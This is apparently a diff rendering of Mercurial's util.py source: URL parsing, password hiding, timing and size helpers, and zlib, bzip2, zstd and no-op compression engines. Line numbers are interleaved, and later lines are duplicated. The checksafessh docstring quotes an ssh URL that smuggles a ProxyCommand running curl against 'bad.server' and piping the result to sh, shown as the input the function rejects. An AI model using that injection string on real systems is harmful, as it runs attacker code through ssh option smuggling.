    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        # the fragment is chopped off first so '#' never confuses the
        # remaining component parsing
        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        # local paths (no scheme) keep the rest verbatim
        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

        if parsequery and '?' in path:
            path, self.query = path.split('?', 1)
            if not path:
                path = None
            if not self.query:
                self.query = None

        # // is required to specify a host/authority
        if path and path.startswith('//'):
            parts = path[2:].split('/', 1)
            if len(parts) > 1:
                self.host, path = parts
            else:
                self.host = parts[0]
                path = None
            if not self.host:
                self.host = None
                # path of file:///d is /d
                # path of file:///d:/ is d:/, not /d:/
                if path and not hasdriveletter(path):
                    path = '/' + path

        if self.host and '@' in self.host:
            self.user, self.host = self.host.rsplit('@', 1)
            if ':' in self.user:
                self.user, self.passwd = self.user.split(':', 1)
            if not self.host:
                self.host = None

        # Don't split on colons in IPv6 addresses without ports
        if (self.host and ':' in self.host and
            not (self.host.startswith('[') and self.host.endswith(']'))):
            self._hostport = self.host
            self.host, self.port = self.host.rsplit(':', 1)
            if not self.host:
                self.host = None

        if (self.host and self.scheme == 'file' and
            self.host not in ('localhost', '127.0.0.1', '[::1]')):
            raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        # show only the components that were actually parsed
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        # serialize the URL without credentials, restoring them afterwards
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')
3074
3066
def hasscheme(path):
    """Report whether *path* carries a URL scheme component."""
    parsed = url(path)
    return bool(parsed.scheme)
3077
3069
def hasdriveletter(path):
    """Report whether *path* starts with a Windows drive letter ("c:...")."""
    if not path:
        # preserve the falsy input itself ('' or None), as callers rely on
        # plain truthiness
        return path
    return path[1:2] == ':' and path[0:1].isalpha()
3080
3072
def urllocalpath(path):
    """Return the local filesystem path for *path*, leaving any query and
    fragment text embedded in the path component."""
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
3083
3075
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    # a leading '-' right after the scheme would be handed to ssh as an
    # option rather than a host name
    if path.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))
3098
3090
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        # keep the structure visible but mask the secret
        parsed.passwd = '***'
    return bytes(parsed)
3105
3097
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # return bytes for consistency with hidepassword(); str(u) would go
    # through encoding.strmethod and yield a unicode string on Python 3
    return bytes(u)
3111
3103
# Human-readable formatter for a duration given in seconds. Each entry is a
# (threshold, divisor, format) triple spanning seconds down to nanoseconds;
# NOTE(review): exact selection semantics live in unitcountfn (defined
# earlier in this module) -- confirm there before relying on the thresholds.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
3127
3119
# current indentation level for nested @timed reports (one-element list so
# the closure below can mutate it)
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapped(*args, **kwargs):
        begin = timer()
        step = 2
        _timenesting[0] += step
        try:
            return func(*args, **kwargs)
        finally:
            duration = timer() - begin
            _timenesting[0] -= step
            # print after unwinding so nested calls report innermost first
            stderr.write('%s%s: %s\n'
                         % (' ' * _timenesting[0], func.__name__,
                            timecount(duration)))
    return wrapped
3154
3146
# size suffixes and their byte multipliers; the bare 'b' entry is last so
# that 'kb'/'mb'/'gb' match before it
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, factor in _sizeunits:
            if spec.endswith(suffix):
                return int(float(spec[:-len(suffix)]) * factor)
        # no recognized suffix: plain integer byte count
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3176
3168
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source, callable) pairs; ordered lazily on invocation
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        # sort by source name only -- callables may not be comparable
        self._hooks.sort(key=lambda pair: pair[0])
        return [fn(*args) for _src, fn in self._hooks]
3194
3186
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
        length of longest filepath+line number,
        filepath+linenumber,
        function

    Not be used in production code but very convenient while developing.
    '''
    frames = []
    # drop the 'skip' innermost frames (plus this function's own frame)
    for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]:
        frames.append((fileline % (pycompat.sysbytes(fn), ln),
                       pycompat.sysbytes(func)))
    # depth == 0 keeps everything since frames[-0:] is the whole list
    frames = frames[-depth:]
    if not frames:
        return
    width = max(len(entry[0]) for entry in frames)
    for fnln, func in frames:
        if line is None:
            yield (width, fnln, func)
        else:
            yield line % (width, fnln, func)
3217
3209
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        # flush the other stream first so the two outputs interleave sanely
        otherf.flush()
    header = '%s at:\n' % msg.rstrip()
    f.write(header)
    # skip + 1 also hides this function's own frame
    for frameline in getstackframes(skip + 1, depth=depth):
        f.write(frameline)
    f.flush()
3232
3224
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # directory name -> reference count of tracked descendants
        self._dirs = {}
        if skip is not None and safehasattr(map, 'iteritems'):
            # dirstate-style mapping: entries whose state matches 'skip'
            # are excluded from the multiset
            for fname, entry in map.iteritems():
                if entry[0] != skip:
                    self.addpath(fname)
        else:
            for fname in map:
                self.addpath(fname)

    def addpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                # this ancestor (and therefore all of its own ancestors)
                # is already counted; bumping it once is enough
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if counts[base] > 1:
                # still referenced by other paths; ancestors stay too
                counts[base] -= 1
                return
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3268
3260
# Prefer the C implementation of 'dirs' from the parsers module when it
# is available; it replaces the pure Python class defined above.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3271
3263
def finddirs(path):
    '''Yield each ancestor directory of a '/'-separated path, deepest
    first: 'a/b/c' yields 'a/b', then 'a'. A path containing no '/'
    yields nothing.'''
    cut = path.rfind('/')
    while cut >= 0:
        yield path[:cut]
        cut = path.rfind('/', 0, cut)
3277
3269
# compression code

# Role identifiers used when negotiating wire protocol compression.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes an engine's wire protocol support: the advertised format
# name plus the integer priorities used to order advertisement on the
# server and client sides (see compressionengine.wireprotosupport()).
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3286
3278
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        # Engine name to compressionengine instance.
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        # Look up an engine by its registered name; raises KeyError.
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Aborts if the engine name, bundle name/type, wire type, or revlog
        header collides with an already-registered engine.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        # Record the engine itself only after all collision checks passed.
        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        """Obtain a compression engine registered to a wire proto identifier.

        Will raise KeyError if the wire type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]
3440
3432
# Global registry that all compression engines register against.
compengines = compressormanager()
3442
3434
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    # Abstract interface: subclasses override the methods relevant to the
    # contexts they support (bundles, wire protocol, revlogs).

    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and `decompressorreader`.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3559
3551
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        # 'x' (0x78) is the leading byte of a zlib stream produced with
        # default settings, so raw zlib output is self-identifying.
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        # level -1 means zlib's default compression level
        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                # a single input chunk may decompress to much more data,
                # so drain it in bounded pieces
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                # too small for compression to be a net win
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                # only return compressed form if it is actually smaller
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    # feed the data in 1 MiB slices
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        # opts is accepted for interface compatibility but unused here
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3646
3638
3647 class _bz2engine(compressionengine):
3639 class _bz2engine(compressionengine):
3648 def name(self):
3640 def name(self):
3649 return 'bz2'
3641 return 'bz2'
3650
3642
3651 def bundletype(self):
3643 def bundletype(self):
3652 """An algorithm that produces smaller bundles than ``gzip``.
3644 """An algorithm that produces smaller bundles than ``gzip``.
3653
3645
3654 All Mercurial clients should support this format.
3646 All Mercurial clients should support this format.
3655
3647
3656 This engine will likely produce smaller bundles than ``gzip`` but
3648 This engine will likely produce smaller bundles than ``gzip`` but
3657 will be significantly slower, both during compression and
3649 will be significantly slower, both during compression and
3658 decompression.
3650 decompression.
3659
3651
3660 If available, the ``zstd`` engine can yield similar or better
3652 If available, the ``zstd`` engine can yield similar or better
3661 compression at much higher speeds.
3653 compression at much higher speeds.
3662 """
3654 """
3663 return 'bzip2', 'BZ'
3655 return 'bzip2', 'BZ'
3664
3656
3665 # We declare a protocol name but don't advertise by default because
3657 # We declare a protocol name but don't advertise by default because
3666 # it is slow.
3658 # it is slow.
3667 def wireprotosupport(self):
3659 def wireprotosupport(self):
3668 return compewireprotosupport('bzip2', 0, 0)
3660 return compewireprotosupport('bzip2', 0, 0)
3669
3661
3670 def compressstream(self, it, opts=None):
3662 def compressstream(self, it, opts=None):
3671 opts = opts or {}
3663 opts = opts or {}
3672 z = bz2.BZ2Compressor(opts.get('level', 9))
3664 z = bz2.BZ2Compressor(opts.get('level', 9))
3673 for chunk in it:
3665 for chunk in it:
3674 data = z.compress(chunk)
3666 data = z.compress(chunk)
3675 if data:
3667 if data:
3676 yield data
3668 yield data
3677
3669
3678 yield z.flush()
3670 yield z.flush()
3679
3671
3680 def decompressorreader(self, fh):
3672 def decompressorreader(self, fh):
3681 def gen():
3673 def gen():
3682 d = bz2.BZ2Decompressor()
3674 d = bz2.BZ2Decompressor()
3683 for chunk in filechunkiter(fh):
3675 for chunk in filechunkiter(fh):
3684 yield d.decompress(chunk)
3676 yield d.decompress(chunk)
3685
3677
3686 return chunkbuffer(gen())
3678 return chunkbuffer(gen())
3687
3679
# Make the bzip2 engine available through the global compression-engine
# registry, like the other engines below.
compengines.register(_bz2engine())
3689
3681
class _truncatedbz2engine(compressionengine):
    """bzip2 decompression for streams whose leading 'BZ' magic is absent.

    Decompression-only: there is deliberately no ``compressstream``.
    """

    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # No user-selectable bundle spec name; only the on-the-wire tag.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def decompressed():
            decomp = bz2.BZ2Decompressor()
            # The input stream doesn't have the 'BZ' header. So add it back.
            decomp.decompress('BZ')
            for block in filechunkiter(fh):
                yield decomp.decompress(block)

        return chunkbuffer(decompressed())

compengines.register(_truncatedbz2engine())
3710
3702
class _noopengine(compressionengine):
    """Pass-through engine: no compression or decompression is performed."""

    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # Identity transform: hand the chunk iterator back unchanged.
        return it

    def decompressorreader(self, fh):
        # Identity transform: the file object already yields the raw data.
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # Always None, i.e. no compressed form is produced.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())
3745
3737
class _zstdengine(compressionengine):
    """Compression engine backed by the optional bundled ``zstd`` module.

    The module may be missing from some installs, so availability is
    probed lazily via ``_module``.
    """

    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        # True only when the lazy import above succeeded.
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        # Byte tag identifying zstd-compressed revlog chunks.
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            """Return compressed ``data``, or None when not worthwhile."""
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                # Too small for compression to plausibly pay off.
                return None

            elif insize <= 1000000:
                # One-shot compression for modest inputs.
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Chunked streaming compression for large inputs.
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                # Only use the compressed form if it is actually smaller.
                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                # Normalize any zstd failure into a RevlogError for callers.
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
3874
3866
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    items = {}
    for name in compengines:
        eng = compengines[name]
        if not eng.available():
            continue

        btype = eng.bundletype()
        if not btype or not btype[0]:
            continue

        docstr = pycompat.sysstr('``%s``\n %s') % (
            btype[0], eng.bundletype.__doc__)

        holder = docobject()
        holder.__doc__ = docstr
